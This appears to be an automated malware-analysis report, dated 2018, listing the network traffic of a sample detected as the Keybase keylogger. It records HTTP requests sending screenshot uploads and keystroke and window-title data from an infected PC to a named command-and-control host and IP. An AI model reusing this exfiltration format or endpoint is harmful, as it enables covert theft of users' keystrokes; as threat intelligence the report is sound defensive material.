POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579f6d059e542 Host: settings.platinumistabul.com Content-Length: 627941 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d57a02215b71bc Host: settings.platinumistabul.com Content-Length: 627941 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d57a0d82eab3ba Host: settings.platinumistabul.com Content-Length: 627940 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d57a1079400a7e Host: settings.platinumistabul.com Content-Length: 627917 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=4.22
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=4.22 HTTP/1.1 Host: settings.platinumistabul.com Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=4.43
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=4.43 HTTP/1.1 Host: settings.platinumistabul.com Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=5.43
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=5.43 HTTP/1.1 Host: settings.platinumistabul.com
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Start&keystrokestyped=&machinetime=7.23
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Start&keystrokestyped=&machinetime=7.23 HTTP/1.1 Host: settings.platinumistabul.com Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=7.23
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=7.23 HTTP/1.1 Host: settings.platinumistabul.com
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=9.04
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=9.04 HTTP/1.1 Host: settings.platinumistabul.com Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=9.04
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=9.04 HTTP/1.1 Host: settings.platinumistabul.com
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=17.33
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=17.33 HTTP/1.1 Host: settings.platinumistabul.com Connection: Keep-Alive
Detected family: #Keybase
TheSystem Itself @ 2018-02-22 00:28:02
#infosec #automation
TheSystem Itself @ 2018-02-22 00:03:20